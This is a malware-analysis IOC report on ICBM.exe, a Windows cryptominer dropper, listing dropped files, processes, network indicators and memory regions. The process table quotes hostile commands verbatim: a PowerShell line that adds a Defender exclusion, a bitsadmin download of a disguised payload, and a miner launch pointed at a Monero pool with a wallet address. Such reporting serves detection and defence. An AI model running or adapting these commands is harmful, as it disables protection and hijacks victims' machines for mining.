IOC Report
ICBM.exe

loading gif

Files

File Path
Type
Category
Malicious
ICBM.exe
PE32+ executable (console) x86-64, for MS Windows
initial sample
malicious
C:\Windows\System32\WinRing0x64.sys
PE32+ executable (native) x86-64, for MS Windows
dropped
malicious
C:\Windows\System32\msvchost.exe
PE32+ executable (console) x86-64, for MS Windows
dropped
malicious
C:\IT\service_log.txt
ASCII text, with very long lines (1157)
modified
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xd3882308, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Windows\BIT68D4.tmp
PNG image data, 8386 x 2229, 8-bit/color RGBA, non-interlaced
dropped
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Windows\Temp\__PSScriptPolicyTest_i3meus3n.kc0.psm1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_nw2jrtiw.4f0.ps1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_tnq1uyzk.rif.ps1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_v2txz2bi.k51.psm1
ASCII text, with no line terminators
dropped
C:\Windows\img.png (copy)
PNG image data, 8386 x 2229, 8-bit/color RGBA, non-interlaced
dropped
There are 4 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\ICBM.exe
"C:\Users\user\Desktop\ICBM.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Users\user\Desktop\ICBM.exe
C:\Users\user\Desktop\ICBM.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command "Add-MpPreference -ExclusionPath \"C:\Windows\SystemTemp\delete_clsids.ps1\""
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\bitsadmin.exe
"bitsadmin" /transfer Explorers /download /priority FOREGROUND https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c3772120423724.png C:\Windows\img.png
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\msvchost.exe
C:\Windows\System32\msvchost.exe -o xmr-eu2.nanopool.org:14433 -u 49QjJy47SU1MGFX7Rep7TQUkGUvvTRqSx4HhzqBgMNwtRvxsXMd98sFZLULDV61ncxVr5kazj9asqctBxy6hWm462wGcBQT --tls --coin monero
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\sc.exe
"sc" start my_system_service
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe
There are 4 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c3772120423724
unknown
malicious
https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c3772120423724.png
104.26.9.242
malicious
https://dl.imgdrop.io/
unknown
malicious
https://g.live.com/odclientsettings/Prod/C:
unknown
https://github.com/clap-rs/clap/issuesC:
unknown
https://dl.imgdrop.io:443/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c377212042
unknown
http://ns.adobe.assertion
unknown
http://ocsp.cloudflare.com/origin_ca0
unknown
http://crl.cloudflare.com/origin_ca.crl
unknown
https://docs.rs/getrandom#nodejs-es-module-support
unknown
https://xmrig.com/docs/algorithms
unknown
https://github.com/clap-rs/clap/issues-
unknown
http://crl.cloudflare.com/origin_ca.crl0
unknown
http://crl.ver)
unknown
http://ocsp.cloudflare.com/origin_ca
unknown
http://www.quovadis.bm0
unknown
https://xmrig.com/benchmark/%s
unknown
https://xmrig.com/wizard
unknown
https://ocsp.quovadisoffshore.com0
unknown
https://github.com/clap-rs/clap/issues
unknown
There are 10 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
dl.imgdrop.io
104.26.9.242
malicious
xmr-eu2.nanopool.org
51.210.150.92
malicious

IPs

IP
Domain
Country
Malicious
104.26.9.242
dl.imgdrop.io
United States
malicious
51.15.89.13
unknown
France
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_USERS.DEFAULT\Software\Classes\Local Settings\MuiCache\e\52C64B7E
@%ProgramFiles%\Windows Defender\MpAsDesc.dll,-300
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName

Memdumps

Base Address
Regiontype
Protect
Malicious
1BC2473B000
heap
page read and write
malicious
1C5A7157000
heap
page read and write
malicious
1C5A70FC000
heap
page read and write
malicious
7FF678047000
unkown
page readonly
malicious
7FF6784D0000
unkown
page readonly
malicious
1C5A7167000
heap
page read and write
malicious
1C5A7133000
heap
page read and write
malicious
1C5A8C54000
direct allocation
page execute and read and write
173B2FC000
stack
page read and write
22D94C93000
heap
page read and write
22D9EAD0000
trusted library allocation
page read and write
21AA1550000
heap
page read and write
37048FE000
stack
page read and write
22D94CDB000
heap
page read and write
22D968F5000
heap
page read and write
22D9EAB0000
trusted library allocation
page read and write
22D9EA10000
trusted library allocation
page read and write
37051FF000
stack
page read and write
1C5AB600000
direct allocation
page read and write
22D963C0000
trusted library allocation
page read and write
DFAC3FE000
stack
page read and write
18C2A1A0000
unkown
page read and write
18C28430000
unkown
page read and write
21AA1820000
heap
page read and write
1ABC93E000
unkown
page read and write
7FF601890000
unkown
page readonly
22D94B80000
heap
page read and write
3B2AF7E000
stack
page read and write
3704EFE000
stack
page read and write
22D9EB80000
trusted library allocation
page read and write
1C5AA200000
direct allocation
page read and write
37055FF000
stack
page read and write
1BC183B7000
heap
page read and write
1BC19B82000
heap
page read and write
173B4FE000
stack
page read and write
22D94CC5000
heap
page read and write
18C2A586000
unkown
page read and write
4BDA67F000
stack
page read and write
22D94C9A000
heap
page read and write
3F1E4FF000
stack
page read and write
37054FF000
stack
page read and write
37052FE000
stack
page read and write
22D94C91000
heap
page read and write
22D95502000
heap
page read and write
22D9F000000
heap
page read and write
18C28440000
heap
page read and write
22D94D02000
heap
page read and write
7FF601AEB000
unkown
page readonly
1BC18550000
heap
page read and write
18C2A28E000
unkown
page read and write
1BC19182000
heap
page read and write
22D9EAE4000
trusted library allocation
page read and write
18C2A502000
unkown
page read and write
18C28670000
heap
page read and write
37022FE000
stack
page read and write
1C5A8D96000
direct allocation
page execute and read and write
22D953A0000
trusted library section
page read and write
22D94CB9000
heap
page read and write
1243F7F0000
heap
page read and write
DFAB6DB000
stack
page read and write
37049FE000
stack
page read and write
1BC18630000
heap
page read and write
22D96864000
heap
page read and write
1C5A8BA0000
direct allocation
page execute and read and write
1C5A8D44000
heap
page read and write
3F1E3FF000
stack
page read and write
3703DFE000
stack
page read and write
37056FF000
stack
page read and write
1ABCC7C000
unkown
page read and write
1BC18635000
heap
page read and write
37020FE000
stack
page read and write
22D9EC60000
remote allocation
page read and write
3B2B07E000
stack
page read and write
7FF601AEB000
unkown
page readonly
18C2A58B000
unkown
page read and write
1656B7C6000
heap
page read and write
3704DFE000
stack
page read and write
1243F650000
heap
page read and write
37035FE000
stack
page read and write
22D9EC10000
trusted library allocation
page read and write
22D9EAD0000
trusted library allocation
page read and write
22D96A00000
trusted library allocation
page read and write
DFABE7A000
stack
page read and write
3704CFE000
stack
page read and write
1656B8C0000
heap
page read and write
7FF601890000
unkown
page readonly
DFAC57F000
stack
page read and write
1C5AC000000
direct allocation
page read and write
37025FD000
stack
page read and write
22D9EAE0000
trusted library allocation
page read and write
22D94C70000
heap
page read and write
1BC1D8E3000
heap
page read and write
18C28400000
unkown
page readonly
DFAC47F000
stack
page read and write
7FF601890000
unkown
page readonly
18C2A4A0000
unkown
page read and write
1C5A8D85000
direct allocation
page execute and read and write
3B2AEFF000
stack
page read and write
22D95519000
heap
page read and write
1656B810000
heap
page read and write
21AA1895000
heap
page read and write
DFAC1FC000
stack
page read and write
22D962C0000
trusted library section
page readonly
22D9EB70000
trusted library allocation
page read and write
1656B7C0000
heap
page read and write
18C2A302000
unkown
page read and write
7FF601A4D000
unkown
page readonly
3704AFE000
stack
page read and write
22D95415000
heap
page read and write
18C286B5000
heap
page read and write
22D94B60000
unclassified section
page readonly
22D9EABC000
trusted library allocation
page read and write
22D94D13000
heap
page read and write
18C2A544000
unkown
page read and write
22D9EA20000
trusted library allocation
page read and write
22D9EBF0000
trusted library allocation
page read and write
22D9F010000
heap
page read and write
18C28447000
heap
page read and write
22D94C8C000
heap
page read and write
22D96270000
trusted library section
page readonly
1C5AFC00000
direct allocation
page read and write
22D94C13000
heap
page read and write
DFAC5FE000
stack
page read and write
21AA15E9000
heap
page read and write
DFAC07F000
stack
page read and write
22D96843000
heap
page read and write
7FF601A4D000
unkown
page readonly
1BC18417000
heap
page read and write
37023FE000
stack
page read and write
37046FB000
stack
page read and write
DFABB78000
stack
page read and write
22D9EAC3000
trusted library allocation
page read and write
22D94CC9000
heap
page read and write
22D94C2A000
heap
page read and write
18C2A47A000
unkown
page read and write
1C5A8D5C000
heap
page read and write
7FF6781EF000
unkown
page write copy
22D9EAB9000
trusted library allocation
page read and write
22D9EAC6000
trusted library allocation
page read and write
1BC183A4000
heap
page read and write
1C5ADE00000
direct allocation
page read and write
1C5A8D3C000
heap
page read and write
22D94CB3000
heap
page read and write
22D949F0000
heap
page read and write
21AA15E0000
heap
page read and write
22D96854000
heap
page read and write
37047FF000
stack
page read and write
1243F55B000
heap
page read and write
1C5A8C33000
direct allocation
page execute and read and write
22D96100000
trusted library allocation
page read and write
1C5A8D34000
heap
page read and write
1C5A71D8000
heap
page read and write
1C5A9800000
direct allocation
page read and write
1C5A8DB7000
direct allocation
page execute and read and write
22D95500000
heap
page read and write
1BC18300000
heap
page read and write
1BC183AE000
heap
page read and write
22D9689F000
heap
page read and write
7FF601AEA000
unkown
page write copy
1BC183B4000
heap
page read and write
22D9EAA0000
trusted library allocation
page read and write
22D9559B000
heap
page read and write
1BC1A582000
heap
page read and write
1BC1ECE3000
heap
page read and write
22D962B0000
trusted library section
page readonly
1C5A8E00000
direct allocation
page read and write
22D9EAA0000
trusted library allocation
page read and write
22D9EAC9000
trusted library allocation
page read and write
22D94C7C000
heap
page read and write
22D96280000
trusted library section
page readonly
1ABCBFD000
unkown
page read and write
7FF601891000
unkown
page execute read
7FF677C20000
unkown
page readonly
22D96800000
heap
page read and write
1243F576000
heap
page read and write
1C5A8D2C000
heap
page read and write
18C28540000
unkown
page read and write
DFAC27E000
stack
page read and write
18C28A51000
unkown
page readonly
22D9EB70000
trusted library allocation
page read and write
22D96895000
heap
page read and write
4BDA39E000
stack
page read and write
1BC18782000
heap
page read and write
7FF601A4D000
unkown
page readonly
18C2A364000
unkown
page read and write
1C5A8C44000
direct allocation
page execute and read and write
18C2A498000
unkown
page read and write
22D96A10000
trusted library allocation
page read and write
7FF677C21000
unkown
page execute read
1C5B0600000
direct allocation
page read and write
1C5A8C23000
direct allocation
page execute and read and write
22D9EAA1000
trusted library allocation
page read and write
7FF601AEB000
unkown
page readonly
22D9689C000
heap
page read and write
1C5A7060000
heap
page read and write
3F1E2FC000
stack
page read and write
18C2A564000
unkown
page read and write
22D96968000
heap
page read and write
22D96A03000
trusted library allocation
page read and write
3B2AFFC000
stack
page read and write
22D94CF9000
heap
page read and write
22D94A00000
unclassified section
page readonly
1BC1AF82000
heap
page read and write
1C5A8D1C000
heap
page read and write
22D94A60000
heap
page read and write
1ABC938000
unkown
page read and write
37025FB000
stack
page read and write
7FF601A93000
unkown
page readonly
22D9687F000
heap
page read and write
37045FE000
stack
page read and write
7FF6784CA000
unkown
page execute read
1C5A8BC0000
direct allocation
page execute and read and write
1C5A72C0000
heap
page read and write
1C5A8C70000
heap
page read and write
22D968D0000
heap
page read and write
22D95519000
heap
page read and write
22D94CEE000
heap
page read and write
1C5A8D4C000
heap
page read and write
1C5A8AE0000
heap
page read and write
1C5A8CB0000
heap
page read and write
22D9EA90000
trusted library allocation
page read and write
37053FF000
stack
page read and write
22D9EAC0000
trusted library allocation
page read and write
1BC18380000
heap
page read and write
1C5A8C6D000
heap
page read and write
18C28411000
unkown
page readonly
1C5ACA00000
direct allocation
page read and write
1C5A8BD0000
direct allocation
page execute and read and write
1656B7FE000
heap
page read and write
1ABCB7E000
unkown
page read and write
18C283F0000
unkown
page readonly
7FF601AEA000
unkown
page write copy
1BC183B1000
heap
page read and write
7FF601A93000
unkown
page readonly
1C5A8D54000
heap
page read and write
1C5AF200000
direct allocation
page read and write
7FF601AEA000
unkown
page read and write
1C5A8C12000
direct allocation
page execute and read and write
22D967E1000
trusted library allocation
page read and write
22D968B6000
heap
page read and write
1C5A8D6C000
heap
page read and write
1BC183B7000
heap
page read and write
22D94CD2000
heap
page read and write
1C5A8DC7000
direct allocation
page execute and read and write
1C5A8CFD000
heap
page read and write
22D9695F000
heap
page read and write
22D95400000
heap
page read and write
22D9EAAA000
trusted library allocation
page read and write
7FF601891000
unkown
page execute read
3B2AB39000
stack
page read and write
22D9EA80000
trusted library allocation
page read and write
1BC183B4000
heap
page read and write
1243F470000
heap
page read and write
21AA17B0000
heap
page read and write
22D9EAB3000
trusted library allocation
page read and write
18C2A410000
unkown
page read and write
3B2ABBF000
stack
page read and write
1BC183A7000
heap
page read and write
3704FFF000
stack
page read and write
1C5AD400000
direct allocation
page read and write
1BC1E2E3000
heap
page read and write
22D9EAB6000
trusted library allocation
page read and write
37046FE000
stack
page read and write
1C5A8C65000
heap
page read and write
1C5A8D75000
direct allocation
page execute and read and write
22D9EBF0000
trusted library allocation
page read and write
22D94C6F000
heap
page read and write
1656B804000
heap
page read and write
7FF67849F000
unkown
page readonly
1C5A8D64000
heap
page read and write
1C5A8BF1000
direct allocation
page execute and read and write
18C2A2A0000
unkown
page read and write
1656B640000
heap
page read and write
22D9EC00000
trusted library allocation
page read and write
7FF601AEB000
unkown
page readonly
22D95513000
heap
page read and write
1BC183C7000
heap
page read and write
18C2A5CC000
unkown
page read and write
1C5A8C60000
heap
page read and write
22D9EC60000
remote allocation
page read and write
173B5FE000
stack
page read and write
7FF601891000
unkown
page execute read
DFAC2FF000
stack
page read and write
DFABF7C000
stack
page read and write
1C5A8C02000
direct allocation
page execute and read and write
1656BA40000
heap
page read and write
1C5A70F0000
heap
page read and write
7FF601890000
unkown
page readonly
22D94C40000
heap
page read and write
22D94C6B000
heap
page read and write
18C285B0000
unkown
page read and write
1BC183B7000
heap
page read and write
22D9EC60000
remote allocation
page read and write
1BC18389000
heap
page read and write
22D94CC1000
heap
page read and write
22D96892000
heap
page read and write
22D968A3000
heap
page read and write
21AA1890000
heap
page read and write
22D94C00000
heap
page read and write
3F1E5FF000
stack
page read and write
7FF601A93000
unkown
page readonly
1C5A8DA6000
direct allocation
page execute and read and write
1BC185C0000
heap
page read and write
DFAC0FE000
stack
page read and write
22D9EE50000
trusted library allocation
page read and write
3704BFF000
stack
page read and write
1BC18408000
heap
page read and write
37021FF000
stack
page read and write
173B3FE000
stack
page read and write
22D94CAF000
heap
page read and write
22D9EBE0000
trusted library allocation
page read and write
3F1E6FC000
stack
page read and write
1243F550000
heap
page read and write
1BC183BF000
heap
page read and write
7FF601A93000
unkown
page readonly
22D94C59000
heap
page read and write
DFABC7E000
stack
page read and write
22D96290000
trusted library section
page readonly
3702DFC000
stack
page read and write
22D96874000
heap
page read and write
1C5AAC00000
direct allocation
page read and write
1C5A8D00000
heap
page read and write
18C2A3C6000
unkown
page read and write
7FF601891000
unkown
page execute read
7FF601A4D000
unkown
page readonly
1C5A8BE1000
direct allocation
page execute and read and write
1656B930000
heap
page read and write
1C5A71D4000
heap
page read and write
18C286B0000
heap
page read and write
4BDA31D000
stack
page read and write
1C5A8BAF000
direct allocation
page execute and read and write
1243F340000
heap
page read and write
1BC183B4000
heap
page read and write
7FF601AEA000
unkown
page read and write
1656B80E000
heap
page read and write
1BC1B982000
heap
page read and write
22D94C96000
heap
page read and write
1C5A8B50000
direct allocation
page execute read
1ABC940000
unkown
page read and write
37024FE000
stack
page read and write
1BC1CEE3000
heap
page read and write
22D9EBD0000
trusted library allocation
page read and write
22D9688A000
heap
page read and write
1C5A8D24000
heap
page read and write
3B2AE7E000
stack
page read and write
22D9EAA4000
trusted library allocation
page read and write
22D9EAAD000
trusted library allocation
page read and write
22D9EABF000
trusted library allocation
page read and write
DFABD79000
stack
page read and write
1BC183AF000
heap
page read and write
22D94C31000
heap
page read and write
1BC1F6E3000
heap
page read and write
22D962A0000
trusted library section
page readonly
DFAC9FF000
stack
page read and write
22D94BD0000
trusted library allocation
page read and write
37050FE000
stack
page read and write
22D96902000
heap
page read and write
DFABFFF000
stack
page read and write
1C5AE800000
direct allocation
page read and write
18C282E0000
heap
page read and write
1C5A8CF0000
heap
page read and write
DFAC6FB000
stack
page read and write
22D968F1000
heap
page read and write
22D94B70000
unclassified section
page readonly
1656B7E9000
heap
page read and write
22D94C81000
heap
page read and write
3701BAA000
stack
page read and write
1656BA45000
heap
page read and write
22D96881000
heap
page read and write
22D95402000
heap
page read and write
1C5A8BA8000
direct allocation
page execute and read and write
There are 361 hidden memdumps, click here to show them.